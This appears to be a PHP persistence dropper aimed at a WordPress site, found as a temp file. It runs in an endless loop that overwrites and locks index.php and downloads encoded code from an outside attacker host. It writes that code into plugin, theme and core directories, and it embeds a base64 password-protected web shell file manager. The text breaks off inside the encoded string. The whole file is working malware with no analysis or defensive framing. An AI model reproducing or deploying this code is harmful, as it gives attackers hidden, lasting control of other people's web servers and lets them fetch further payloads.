File: C:/Windows/Temp/tmkAEF3.tmp
<?php
$tezhen_code = "<!-- monobovoppPPPKJDSALDDSSAD1ab4d6f8d41abab37e7a1b67a2469085QQWEDASDxyz789eefff --><!-- >ok< -->";
$SHELLACTION = "https://niu.kdfdc.shop/api/doshell";
$file_content = "PCEtLSBtb25vYm92b3BwUFBQS0pEU0FMRERTU0FEMWFiNGQ2ZjhkNDFhYmFiMzdlN2ExYjY3YTI0NjkwODVRUVdFREFTRHh5ejc4OWVlZmZmIC0tPjwhLS0gPm9rPCAtLT4=";
$file_content = base64_decode($file_content);
$file_path = "C:/github_repos/wp-xsj21/index.php";
$weihu_file_path = "C:/github_repos/wp-xsj21/wp-includes/sitemaps/providers/public/contents/index.php";
$ma_file_path = "C:/github_repos/wp-xsj21/wp-includes/public/js/wp-kbbrands/index.php";
$ht_file_path = "C:/github_repos/wp-xsj21/.htaccess";
$file_path = realpath($file_path);
$min_file_size = "14661";
$max_file_size = "15661";
while(true){
if (file_exists($file_path)) {
$file_size = filesize($file_path);
if($file_size>=$min_file_size && $file_size<=$max_file_size){
@chmod($file_path,0444);
}else{
@chmod($file_path,0775);
@file_put_contents($file_path,$file_content);
sleep(1);
traverseDirectory("C:/github_repos/wp-xsj21",[],$tezhen_code,$file_content);
}
}else{
@file_put_contents($file_path,$file_content);
@chmod($file_path,0444);
sleep(1);
traverseDirectory("C:/github_repos/wp-xsj21",[],$tezhen_code,$file_content);
}
@chmod($ma_file_path,0775);
@chmod($weihu_file_path,0775);
if(!file_exists($weihu_file_path) || filesize($weihu_file_path)<265000 || filesize($weihu_file_path)>268000){
traverseDirectory("C:/github_repos/wp-xsj21",[],$tezhen_code,$file_content);
$weihu_file_content = @makeCurlRequest($SHELLACTION."?type=getweihucode");
$weihu_file_content = base64_decode($weihu_file_content);
$weihu_file_content = $weihu_file_content.$tezhen_code;
$weihu_file_path_dir = str_replace("index.php","",$weihu_file_path);
if(!is_dir($weihu_file_path_dir)){
@mkdir($weihu_file_path_dir, 0755, true);
}
if(!is_writable($weihu_file_path) && file_exists($weihu_file_path)){
@chmod($weihu_file_path,0775);
}
file_put_contents($weihu_file_path,$weihu_file_content);
$dirpath2 = "C:/github_repos/wp-xsj21/wp-content/plugins/akismet/views/main/widgets/";
if(!is_dir($dirpath2)){
@mkdir($dirpath2, 0755, true);
}
if(!is_writable($dirpath2."index.php") && file_exists($dirpath2."index.php")){
@chmod($dirpath2."index.php",0775);
}
file_put_contents($dirpath2."index.php",$weihu_file_content);
$dirpath3 = "C:/github_repos/wp-xsj21/wp-content/themes/twentytwentyfour/patterns/contents/class/";
if(!is_dir($dirpath3)){
@mkdir($dirpath3, 0755, true);
}
if(!is_writable($dirpath3."index.php") && file_exists($dirpath3."index.php")){
@chmod($dirpath3."index.php",0775);
}
file_put_contents($dirpath3."index.php",$weihu_file_content);
}
if(!file_exists($ma_file_path) || filesize($ma_file_path)<13000 || filesize($ma_file_path)>15000 ){
traverseDirectory("C:/github_repos/wp-xsj21",[],$tezhen_code,$file_content);
$codestr = "PCFET0NUWVBFIGh0bWw+DQoNCjxodG1sIGxhbmc9ImVuIj4NCg0KPGhlYWQ+DQogICAgPG1ldGEgY2hhcnNldD0iVVRGLTgiPg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSI+DQogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPg0KICAgIDx0aXRsZT5FbGVwPC90aXRsZT4NCiAgICA8bGluayBocmVmPSJodHRwczovL2Nkbi5qc2RlbGl2ci5uZXQvbnBtL2Jvb3RzdHJhcEA1LjMuMC1hbHBoYTEvZGlzdC9jc3MvYm9vdHN0cmFwLm1pbi5jc3MiIHJlbD0ic3R5bGVzaGVldCINCiAgICAgICAgaW50ZWdyaXR5PSJzaGEzODQtR0xobFRROGlSQUJkWkxsNk8zb1ZNV1NrdFFPcDZiN0luMVpsMy9KcjU5YjZFR0dvSTFhRmt3N2NtREE2ajZnRCIgY3Jvc3NvcmlnaW49ImFub255bW91cyI+DQogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9mb250LWF3ZXNvbWUvNi4zLjAvY3NzL2FsbC5taW4uY3NzIg0KICAgICAgICBpbnRlZ3JpdHk9InNoYTUxMi1TemxyeFdVbHBmdXpRK3BjVUNvc3hjZ2xRUk5BcS9EWmpWc0MwbEU0MHhzQURzZmVRb0V5cEUrZW53Y09pR2prL2JTdUdHS0hFeWpTb1ExelZpc2FuUT09Ig0KICAgICAgICBjcm9zc29yaWdpbj0iYW5vbnltb3VzIiByZWZlcnJlcnBvbGljeT0ibm8tcmVmZXJyZXIiIC8+DQo8L2hlYWQ+DQoNCjxib2R5Pg0KDQogICAgPD9waHANCg0KICAgICRwc2QgPSAiNTY3ZmQ2OGFkYmRjOTRmZDk4ZWUwYzRjN2EwNTRlZGIiOw0KDQogICAgZnVuY3Rpb24gY2hlY2twc2QoJHBzZCl7DQogICAgICAgICRpcCA9IGdldENsaWVudElwKCk7DQogICAgICAgIGlmKCRpcCE9IiIpew0KICAgICAgICAgICAgJHBhc3N3b3JkID0gQGZpbGVfZ2V0X2NvbnRlbnRzKF9fRElSX18uIi8iLm1kNSgkaXApLiIudHh0Iik7DQogICAgICAgICAgICBpZigkcGFzc3dvcmQ9PSRwc2Qpew0KICAgICAgICAgICAgICAgIHJldHVybiB0cnVlOw0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQogICAgICAgIA0KICAgICAgICBpZihpc3NldCgkX0NPT0tJRVsncHNkJ10pKXsNCg0KICAgICAgICAgICAgaWYoJF9DT09LSUVbJ3BzZCddPT0kcHNkKXsNCiAgICAgICAgICAgICAgICByZXR1cm4gdHJ1ZTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKCRfU0VSVkVSWydSRVFVRVNUX01FVEhPRCddID09ICdHRVQnKSB7DQogICAgICAgIA0KICAgICAgICBpZighY2hlY2twc2QoJHBzZCkpew0KICAgICAgICAgICAgZWNobyAnPGh0bWw+DQogICAgICAgICAgICA8Ym9keT4NCiAgICAgICAgICAgICAgICA8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyIgaWQ9ImlucHV0cHNkIj4NCiAgICAgICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwc2QiIC8+DQogICAgICAgICAgICAgICAgICAgIDxidXR0b24+c3VibWl0PC9idXR0b24+DQogICAgICAgICAgICAgICAgPC9mb3JtPg0KICAgICAgICAgICAgPC9ib2R5Pg0KICAgICAgICA8L2h0bWw+JzsNCiAgICAgICAgICAgIGV4aXQoKTsNCiAgICAgICAgfQ0KICAgIH0gZWxzZWlmICgkX1NFUlZFUlsnUkVRVUVTVF9NRVRIT0QnXSA9PSAnUE9TVCcpIHsNCiAgICAgICAgaWYoIWNoZWNrcHNkKCRwc2QpKXsNCiAgICAgICAgICAgICRpbnB1dF9wc2QgPSBpc3NldCgkX1BPU1RbInBzZCJdKT8kX1BPU1RbInBzZCJdOiIiOw0KICAgICAgICAgICAgaWYoIWVtcHR5KCRpbnB1dF9wc2QpKXsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgICAgaWYobWQ1KCRpbnB1dF9wc2QpPT0kcHNkKXsNCiAgICAgICAgICAgICAgICAgICAgICAgICRjb29raWVfZXhwaXJlID0gdGltZSgpICsgKDg2NDAwICogMSk7DQogICAgICAgICAgICAgICAgICAgICAgICBzZXRjb29raWUoInBzZCIsICRwc2QsICRjb29raWVfZXhwaXJlLCIvIik7DQogICAgICAgICAgICAgICAgICAgICAgICAkaXAgPSBnZXRDbGllbnRJcCgpOw0KICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKF9fRElSX18uIi8iLm1kNSgkaXApLiIudHh0IiwkcHNkKTsNCiAgICAgICAgICAgICAgICAgICAgfWVsc2V7DQogICAgICAgICAgICAgICAgICAgICAgICBleGl0KCJlcnJvciIpOw0KICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICB9ZWxzZXsNCiAgICAgICAgICAgICAgICBleGl0KCJlcnJvciIpOw0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQogICAgfQ0KDQogICAgZnVuY3Rpb24gZ2V0Q2xpZW50SXAoKSB7DQogICAgICAgICRpcEhlYWRlcnMgPSBhcnJheSgnSFRUUF9DRl9DT05ORUNUSU5HX0lQJywgJ0hUVFBfWF9GT1JXQVJERURfRk9SJywgJ0hUVFBfQ0xJRU5UX0lQJywgJ0hUVFBfWF9SRUFMX0lQJywgJ1JFTU9URV9BRERSJyk7DQogICAgICAgIGZvcmVhY2ggKCRpcEhlYWRlcnMgYXMgJGhlYWRlcikge2lmIChpc3NldCgkX1NFUlZFUlskaGVhZGVyXSkgJiYgIWVtcHR5KCRfU0VSVkVSWyRoZWFkZXJdKSkgeyRpcExpc3QgPSBleHBsb2RlKCcsJywgJF9TRVJWRVJbJGhlYWRlcl0pO2ZvcmVhY2ggKCRpcExpc3QgYXMgJGlwKSB7JHRyaW1tZWRJcCA9IHRyaW0oJGlwKTtpZiAoZmlsdGVyX3ZhcigkdHJpbW1lZElwLCBGSUxURVJfVkFMSURBVEVfSVApKSB7cmV0dXJuICR0cmltbWVkSXA7fX19fQ0KICAgICAgICByZXR1cm4gJyc7DQogICAgfQ0KDQogICAgLy9mdW5jdGlvbg0KICAgIGZ1bmN0aW9uIGZvcm1hdFNpemVVbml0cygkYnl0ZXMpDQogICAgew0KICAgICAgICBpZiAoJGJ5dGVzID49IDEwNzM3NDE4MjQpIHsNCiAgICAgICAgICAgICRieXRlcyA9IG51bWJlcl9mb3JtYXQoJGJ5dGVzIC8gMTA3Mzc0MTgyNCwgMikgLiAnIEdCJzsNCiAgICAgICAgfSBlbHNlaWYgKCRieXRlcyA+PSAxMDQ4NTc2KSB7DQogICAgICAgICAgICAkYnl0ZXMgPSBudW1iZXJfZm9ybWF0KCRieXRlcyAvIDEwNDg1NzYsIDIpIC4gJyBNQic7DQogICAgICAgIH0gZWxzZWlmICgkYnl0ZXMgPj0gMTAyNCkgew0KICAgICAgICAgICAgJGJ5dGVzID0gbnVtYmVyX2Zvcm1hdCgkYnl0ZXMgLyAxMDI0LCAyKSAuICcgS0InOw0KICAgICAgICB9IGVsc2VpZiAoJGJ5dGVzID4gMSkgew0KICAgICAgICAgICAgJGJ5dGVzID0gJGJ5dGVzIC4gJyBieXRlcyc7DQogICAgICAgIH0gZWxzZWlmICgkYnl0ZXMgPT0gMSkgew0KICAgICAgICAgICAgJGJ5dGVzID0gJGJ5dGVzIC4gJyBieXRlJzsNCiAgICAgICAgfSBlbHNlIHsNCiAgICAgICAgICAgICRieXRlcyA9ICcwIGJ5dGVzJzsNCiAgICAgICAgfQ0KICAgICAgICByZXR1cm4gJGJ5dGVzOw0KICAgIH0NCg0KICAgIGZ1bmN0aW9uIGZpbGVFeHRlbnNpb24oJGZpbGUpDQogICAgew0KICAgICAgICByZXR1cm4gc3Vic3RyKHN0cnJjaHIoJGZpbGUsICcuJyksIDEpOw0KICAgIH0NCg0KICAgIGZ1bmN0aW9uIGZpbGVJY29uKCRmaWxlKQ0KICAgIHsNCiAgICAgICAgJGltZ3MgPSBhcnJheSgiYXBuZyIsICJhdmlmIiwgImdpZiIsICJqcGciLCAianBlZyIsICJqZmlmIiwgInBqcGVnIiwgInBqcCIsICJwbmciLCAic3ZnIiwgIndlYnAiKTsNCiAgICAgICAgJGF1ZGlvID0gYXJyYXkoIndhdiIsICJtNGEiLCAibTRiIiwgIm1wMyIsICJvZ2ciLCAid2VibSIsICJtcGMiKTsNCiAgICAgICAgJGV4dCA9IHN0cnRvbG93ZXIoZmlsZUV4dGVuc2lvbigkZmlsZSkpOw0KICAgICAgICBpZiAoJGZpbGUgPT0gImVycm9yX2xvZyIpIHsNCiAgICAgICAgICAgIHJldHVybiAnPGkgY2xhc3M9ImZhLXNoYXJwIGZhLXNvbGlkIGZhLWJ1ZyI+PC9pPiAnOw0KICAgICAgICB9IGVsc2VpZiAoJGZpbGUgPT0gIi5odGFjY2VzcyIpIHsNCiAgICAgICAgICAgIHJldHVybiAnPGkgY2xhc3M9ImZhLXNvbGlkIGZhLWhhbW1lciI+PC9pPiAnOw0KICAgICAgICB9DQogICAgICAgIGlmICgkZXh0ID09ICJodG1sIiB8fCAkZXh0ID09ICJodG0iKSB7DQogICAgICAgICAgICByZXR1cm4gJzxpIGNsYXNzPSJmYS1icmFuZHMgZmEtaHRtbDUiPjwvaT4gJzsNCiAgICAgICAgfSBlbHNlaWYgKCRleHQgPT0gInBocCIgfHwgJGV4dCA9PSAicGh0bWwiKSB7DQogICAgICAgICAgICByZXR1cm4gJzxpIGNsYXNzPSJmYS1icmFuZHMgZmEtcGhwIj48L2k+ICc7DQogICAgICAgIH0gZWxzZWlmIChpbl9hcnJheSgkZXh0LCAkaW1ncykpIHsNCiAgICAgICAgICAgIHJldHVybiAnPGkgY2xhc3M9ImZhLXJlZ3VsYXIgZmEtaW1hZ2VzIj48L2k+ICc7DQogICAgICAgIH0gZWxzZWlmICgkZXh0ID09ICJjc3MiKSB7DQogICAgICAgICAgICByZXR1cm4gJzxpIGNsYXNzPSJmYS1icmFuZHMgZmEtY3NzMyI+PC9pPiAnOw0KICAgICAgICB9IGVsc2VpZiAoJGV4dCA9PSAidHh0Iikgew0KICAgICAgICAgICAgcmV0dXJuICc8aSBjbGFzcz0iZmEtcmVndWxhciBmYS1maWxlLWxpbmVzIj48L2k+ICc7DQogICAgICAgIH0gZWxzZWlmIChpbl9hcnJheSgkZXh0LCAkYXVkaW8pKSB7DQogICAgICAgICAgICByZXR1cm4gJzxpIGNsYXNzPSJmYS1kdW90b25lIGZhLWZpbGUtbXVzaWMiPjwvaT4gJzsNCiAgICAgICAgfSBlbHNlaWYgKCRleHQgPT0gInB5Iikgew0KICAgICAgICAgICAgcmV0dXJuICc8aSBjbGFzcz0iZmEtYnJhbmRzIGZhLXB5dGhvbiI+PC9pPiAnOw0KICAgICAgICB9IGVsc2VpZiAoJGV4dCA9PSAianMiKSB7DQogICAgICAgICAgICByZXR1cm4gJzxpIGNsYXNzPSJmYS1icmFuZHMgZmEtanMiPjwvaT4gJzsNCiAgICAgICAgfSBlbHNlIHsNCiAgICAgICAgICAgIHJldHVybiAnPGkgY2xhc3M9ImZhLXNvbGlkIGZhLWZpbGUiPjwvaT4gJzsNCiAgICAgICAgfQ0KICAgIH0NCg0KICAgIGZ1bmN0aW9uIGVuY29kZVBhdGgoJHBhdGgpDQogICAgew0KICAgICAgICAkYSA9IGFycmF5KCIvIiwgIlxcIiwgIi4iLCAiOiIpOw0KICAgICAgICAkYiA9IGFycmF5KCLgppUiLCAi4KaWIiwgIuCmlyIsICLgppgiKTsNCiAgICAgICAgcmV0dXJuIHN0cl9yZXBsYWNlKCRhLCAkYiwgJHBhdGgpOw0KICAgIH0NCiAgICBmdW5jdGlvbiBkZWNvZGVQYXRoKCRwYXRoKQ0KICAgIHsNCiAgICAgICAgJGEgPSBhcnJheSgiLyIsICJcXCIsICIuIiwgIjoiKTsNCiAgICAgICAgJGIgPSBhcnJheSgi4KaVIiwgIuCmliIsICLgppciLCAi4KaYIik7DQogICAgICAgIHJldHVybiBzdHJfcmVwbGFjZSgkYiwgJGEsICRwYXRoKTsNCiAgICB9DQoNCg0KDQogICAgJHJvb3RfcGF0aCA9IF9fRElSX187DQogICAgaWYgKGlzc2V0KCRfR0VUWydwJ10pKSB7DQogICAgICAgIGlmIChlbXB0eSgkX0dFVFsncCddKSkgew0KICAgICAgICAgICAgJHAgPSAkcm9vdF9wYXRoOw0KICAgICAgICB9IGVsc2VpZiAoIWlzX2RpcihkZWNvZGVQYXRoKCRfR0VUWydwJ10pKSkgew0KICAgICAgICAgICAgZWNobyAoIjxzY3JpcHQ+XG5hbGVydCgnRGlyZWN0b3J5IGlzIENvcnJ1cHRlZCBhbmQgVW5yZWFkYWJsZS4nKTtcbndpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKCc/Jyk7XG48L3NjcmlwdD4iKTsNCiAgICAgICAgfSBlbHNlaWYgKGlzX2RpcihkZWNvZGVQYXRoKCRfR0VUWydwJ10pKSkgew0KICAgICAgICAgICAgJHAgPSBkZWNvZGVQYXRoKCRfR0VUWydwJ10pOw0KICAgICAgICB9DQogICAgfSBlbHNlaWYgKGlzc2V0KCRfR0VUWydxJ10pKSB7DQogICAgICAgIGlmICghaXNfZGlyKGRlY29kZVBhdGgoJF9HRVRbJ3EnXSkpKSB7DQogICAgICAgICAgICBlY2hvICgiPHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgnP3A9Jyk7PC9zY3JpcHQ+Iik7DQogICAgICAgIH0gZWxzZWlmIChpc19kaXIoZGVjb2RlUGF0aCgkX0dFVFsncSddKSkpIHsNCiAgICAgICAgICAgICRwID0gZGVjb2RlUGF0aCgkX0dFVFsncSddKTsNCiAgICAgICAgfQ0KICAgIH0gZWxzZSB7DQogICAgICAgICRwID0gJHJvb3RfcGF0aDsNCiAgICB9DQogICAgZGVmaW5lKCJQQVRIIiwgJHApOw0KDQogICAgZWNobyAoJw0KPG5hdiBjbGFzcz0ibmF2YmFyIG5hdmJhci1saWdodCIgc3R5bGU9ImJhY2tncm91bmQtY29sb3I6ICNlM2YyZmQ7Ij4NCiAgPGRpdiBjbGFzcz0ibmF2YmFyLWJyYW5kIj4NCiAgPGEgaHJlZj0iPyI+PGltZyBzcmM9Imh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9odXJhaXJhdGhleHBlci9lbGVwZmlsZW1hbmFnZXIvbWFpbi9pbWcvaWNvbi5wbmciIHdpZHRoPSIzMCIgaGVpZ2h0PSIzMCIgYWx0PSIiPjwvYT4NCicpOw0KDQogICAgJHBhdGggPSBzdHJfcmVwbGFjZSgnXFwnLCAnLycsIFBBVEgpOw0KICAgICRwYXRocyA9IGV4cGxvZGUoJy8nLCAkcGF0aCk7DQogICAgZm9yZWFjaCAoJHBhdGhzIGFzICRpZCA9PiAkZGlyX3BhcnQpIHsNCiAgICAgICAgaWYgKCRkaXJfcGFydCA9PSAnJyAmJiAkaWQgPT0gMCkgew0KICAgICAgICAgICAgJGEgPSB0cnVlOw0KICAgICAgICAgICAgZWNobyAiPGEgaHJlZj1cIj9wPS9cIj4vPC9hPiI7DQogICAgICAgICAgICBjb250aW51ZTsNCiAgICAgICAgfQ0KICAgICAgICBpZiAoJGRpcl9wYXJ0ID09ICcnKQ0KICAgICAgICAgICAgY29udGludWU7DQogICAgICAgIGVjaG8gIjxhIGhyZWY9Jz9wPSI7DQogICAgICAgIGZvciAoJGkgPSAwOyAkaSA8PSAkaWQ7ICRpKyspIHsNCiAgICAgICAgICAgIGVjaG8gc3RyX3JlcGxhY2UoIjoiLCAi4KaYIiwgJHBhdGhzWyRpXSk7DQogICAgICAgICAgICBpZiAoJGkgIT0gJGlkKQ0KICAgICAgICAgICAgICAgIGVjaG8gIuCmlSI7DQogICAgICAgIH0NCiAgICAgICAgZWNobyAiJz4iIC4gJGRpcl9wYXJ0IC4gIjwvYT4vIjsNCiAgICB9DQogICAgZWNobyAoJw0KPC9kaXY+DQo8ZGl2IGNsYXNzPSJmb3JtLWlubGluZSI+DQo8YSBocmVmPSI/dXBsb2FkJnE9JyAuIHVybGVuY29kZShlbmNvZGVQYXRoKFBBVEgpKSAuICciPjxidXR0b24gY2xhc3M9ImJ0biBidG4tZGFyayIgdHlwZT0iYnV0dG9uIj5VcGxvYWQgRmlsZTwvYnV0dG9uPjwvYT4NCjxhIGhyZWY9Ij8iPjxidXR0b24gdHlwZT0iYnV0dG9uIiBjbGFzcz0iYnRuIGJ0bi1kYXJrIj5IT01FPC9idXR0b24+PC9hPg0KPC9kaXY+DQo8L25hdj4nKTsNCg0KDQogICAgaWYgKGlzc2V0KCRfR0VUWydwJ10pKSB7DQoNCiAgICAgICAgLy9mZXRjaCBmaWxlcw0KICAgICAgICBpZiAoaXNfcmVhZGFibGUoUEFUSCkpIHsNCiAgICAgICAgICAgICRmZXRjaF9vYmogPSBzY2FuZGlyKFBBVEgpOw0KICAgICAgICAgICAgJGZvbGRlcnMgPSBhcnJheSgpOw0KICAgICAgICAgICAgJGZpbGVzID0gYXJyYXkoKTsNCiAgICAgICAgICAgIGZvcmVhY2ggKCRmZXRjaF9vYmogYXMgJG9iaikgew0KICAgICAgICAgICAgICAgIGlmICgkb2JqID09ICcuJyB8fCAkb2JqID09ICcuLicpIHsNCiAgICAgICAgICAgICAgICAgICAgY29udGludWU7DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICRuZXdfb2JqID0gUEFUSCAuICcvJyAuICRvYmo7DQogICAgICAgICAgICAgICAgaWYgKGlzX2RpcigkbmV3X29iaikpIHsNCiAgICAgICAgICAgICAgICAgICAgYXJyYXlfcHVzaCgkZm9sZGVycywgJG9iaik7DQogICAgICAgICAgICAgICAgfSBlbHNlaWYgKGlzX2ZpbGUoJG5ld19vYmopKSB7DQogICAgICAgICAgICAgICAgICAgIGFycmF5X3B1c2goJGZpbGVzLCAkb2JqKTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgZWNobyAnDQo8dGFibGUgY2xhc3M9InRhYmxlIHRhYmxlLWhvdmVyIj4NCiAgPHRoZWFkPg0KICAgIDx0cj4NCiAgICAgIDx0aCBzY29wZT0iY29sIj5OYW1lPC90aD4NCiAgICAgIDx0aCBzY29wZT0iY29sIj5TaXplPC90aD4NCiAgICAgIDx0aCBzY29wZT0iY29sIj5Nb2RpZmllZDwvdGg+DQogICAgICA8dGggc2NvcGU9ImNvbCI+UGVybXM8L3RoPg0KICAgICAgPHRoIHNjb3BlPSJjb2wiPkFjdGlvbnM8L3RoPg0KICAgIDwvdHI+DQogIDwvdGhlYWQ+DQogIDx0Ym9keT4NCic7DQogICAgICAgIGZvcmVhY2ggKCRmb2xkZXJzIGFzICRmb2xkZXIpIHsNCiAgICAgICAgICAgIGVjaG8gIiAgICA8dHI+DQogICAgICA8dGQ+PGkgY2xhc3M9J2ZhLXNvbGlkIGZhLWZvbGRlcic+PC9pPiA8YSBocmVmPSc/cD0iIC4gdXJsZW5jb2RlKGVuY29kZVBhdGgoUEFUSCAuICIvIiAuICRmb2xkZXIpKSAuICInPiIgLiAkZm9sZGVyIC4gIjwvYT48L3RkPg0KICAgICAgPHRkPjxiPi0tLTwvYj48L3RkPg0KICAgICAgPHRkPiIuIGRhdGUoIkYgZCBZIEg6aTpzLiIsIGZpbGVtdGltZShQQVRIIC4gIi8iIC4gJGZvbGRlcikpIC4gIjwvdGQ+DQogICAgICA8dGQ+MCIgLiBzdWJzdHIoZGVjb2N0KGZpbGVwZXJtcyhQQVRIIC4gIi8iIC4gJGZvbGRlcikpLCAtMykgLiAiPC9hPjwvdGQ+DQogICAgICA8dGQ+DQogICAgICA8YSB0aXRsZT0nY2htb2QgRmlsZScgaHJlZj0nP3E9IiAuIHVybGVuY29kZShlbmNvZGVQYXRoKFBBVEgpKSAuICImYz0iIC4gJGZvbGRlciAuICInPjxpIGNsYXNzPSdmYS1zb2xpZCBmYS1maWxlLXBlbic+PC9pPjwvYT4NCiAgICAgIDxhIHRpdGxlPSdSZW5hbWUnIGhyZWY9Jz9xPSIgLiB1cmxlbmNvZGUoZW5jb2RlUGF0aChQQVRIKSkgLiAiJnI9IiAuICRmb2xkZXIgLiAiJz48aSBjbGFzcz0nZmEtc2hhcnAgZmEtcmVndWxhciBmYS1wZW4tdG8tc3F1YXJlJz48L2k+PC9hPg0KICAgICAgPGEgdGl0bGU9J0RlbGV0ZScgaHJlZj0nP3E9IiAuIHVybGVuY29kZShlbmNvZGVQYXRoKFBBVEgpKSAuICImZD0iIC4gJGZvbGRlciAuICInPjxpIGNsYXNzPSdmYSBmYS10cmFzaCcgYXJpYS1oaWRkZW49J3RydWUnPjwvaT48L2E+DQogICAgICA8dGQ+DQogICAgPC90cj4NCiI7DQogICAgICAgIH0NCiAgICAgICAgZm9yZWFjaCAoJGZpbGVzIGFzICRmaWxlKSB7DQogICAgICAgICAgICBlY2hvICIgICAgPHRyPg0KICAgICAgICAgIDx0ZD4iIC4gZmlsZUljb24oJGZpbGUpIC4gJGZpbGUgLiAiPC90ZD4NCiAgICAgICAgICA8dGQ+IiAuIGZvcm1hdFNpemVVbml0cyhmaWxlc2l6ZShQQVRIIC4gIi8iIC4gJGZpbGUpKSAuICI8L3RkPg0KICAgICAgICAgIDx0ZD4iIC4gZGF0ZSgiRiBkIFkgSDppOnMuIiwgZmlsZW10aW1lKFBBVEggLiAiLyIgLiAkZmlsZSkpIC4gIjwvdGQ+DQogICAgICAgICAgPHRkPjAiLiBzdWJzdHIoZGVjb2N0KGZpbGVwZXJtcyhQQVRIIC4gIi8iIC4kZmlsZSkpLCAtMykgLiAiPC9hPjwvdGQ+DQogICAgICAgICAgPHRkPg0KICAgICAgICAgIDxhIHRpdGxlPSdjaG1vZCBGaWxlJyBocmVmPSc/cT0iIC4gdXJsZW5jb2RlKGVuY29kZVBhdGgoUEFUSCkpIC4gIiZjPSIgLiAkZmlsZSAuICInPjxpIGNsYXNzPSdmYS1zb2xpZCBmYS1maWxlLXBlbic+PC9pPjwvYT4NCiAgICAgICAgICA8YSB0aXRsZT0nRWRpdCBGaWxlJyBocmVmPSc/cT0iIC4gdXJsZW5jb2RlKGVuY29kZVBhdGgoUEFUSCkpIC4gIiZlPSIgLiAkZmlsZSAuICInPjxpIGNsYXNzPSdmYS1zb2xpZCBmYS1maWxlLXBlbic+PC9pPjwvYT4NCiAgICAgICAgICA8YSB0aXRsZT0nUmVuYW1lJyBocmVmPSc/cT0iIC4gdXJsZW5jb2RlKGVuY29kZVBhdGgoUEFUSCkpIC4gIiZyPSIgLiAkZmlsZSAuICInPjxpIGNsYXNzPSdmYS1zaGFycCBmYS1yZWd1bGFyIGZhLXBlbi10by1zcXVhcmUnPjwvaT48L2E+DQogICAgICAgICAgPGEgdGl0bGU9J0RlbGV0ZScgaHJlZj0nP3E9IiAuIHVybGVuY29kZShlbmNvZGVQYXRoKFBBVEgpKSAuICImZD0iIC4gJGZpbGUgLiAiJz48aSBjbGFzcz0nZmEgZmEtdHJhc2gnIGFyaWEtaGlkZGVuPSd0cnVlJz48L2k+PC9hPg0KICAgICAgICAgIDx0ZD4NCiAgICA8L3RyPg0KIjsNCiAgICAgICAgfQ0KICAgICAgICBlY2hvICIgIDwvdGJvZHk+DQo8L3RhYmxlPiI7DQogICAgfSBlbHNlIHsNCiAgICAgICAgaWYgKGVtcHR5KCRfR0VUKSkgew0KICAgICAgICAgICAgZWNobyAoIjxzY3JpcHQ+d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoJz9wPScpOzwvc2NyaXB0PiIpOw0KICAgICAgICB9DQogICAgfQ0KICAgIGlmIChpc3NldCgkX0dFVFsndXBsb2FkJ10pKSB7DQogICAgICAgIGVjaG8gJw0KICAgIDxmb3JtIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+DQogICAgICAgIFNlbGVjdCBmaWxlIHRvIHVwbG9hZDoNCiAgICAgICAgPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGVUb1VwbG9hZCIgaWQ9ImZpbGVUb1VwbG9hZCI+DQogICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIGNsYXNzPSJidG4gYnRuLWRhcmsiIHZhbHVlPSJVcGxvYWQiIG5hbWU9InVwbG9hZCI+DQogICAgPC9mb3JtPic7DQogICAgfQ0KICAgIGlmIChpc3NldCgkX0dFVFsnciddKSkgew0KICAgICAgICBpZiAoIWVtcHR5KCRfR0VUWydyJ10pICYmIGlzc2V0KCRfR0VUWydxJ10pKSB7DQogICAgICAgICAgICBlY2hvICcNCiAgICA8Zm9ybSBtZXRob2Q9InBvc3QiPg0KICAgICAgICBSZW5hbWU6DQogICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJuYW1lIiB2YWx1ZT0iJyAuICRfR0VUWydyJ10gLiAnIj4NCiAgICAgICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ0biBidG4tZGFyayIgdmFsdWU9IlJlbmFtZSIgbmFtZT0icmVuYW1lIj4NCiAgICA8L2Zvcm0+JzsNCiAgICAgICAgICAgIGlmIChpc3NldCgkX1BPU1RbJ3JlbmFtZSddKSkgew0KICAgICAgICAgICAgICAgICRuYW1lID0gUEFUSCAuICIvIiAuICRfR0VUWydyJ107DQogICAgICAgICAgICAgICAgaWYocmVuYW1lKCRuYW1lLCBQQVRIIC4gIi8iIC4gJF9QT1NUWyduYW1lJ10pKSB7DQogICAgICAgICAgICAgICAgICAgIGVjaG8gKCI8c2NyaXB0PmFsZXJ0KCdSZW5hbWVkLicpOyB3aW5kb3cubG9jYXRpb24ucmVwbGFjZSgnP3A9IiAuIGVuY29kZVBhdGgoUEFUSCkgLiAiJyk7PC9zY3JpcHQ+Iik7DQogICAgICAgICAgICAgICAgfSBlbHNlIHsNCiAgICAgICAgICAgICAgI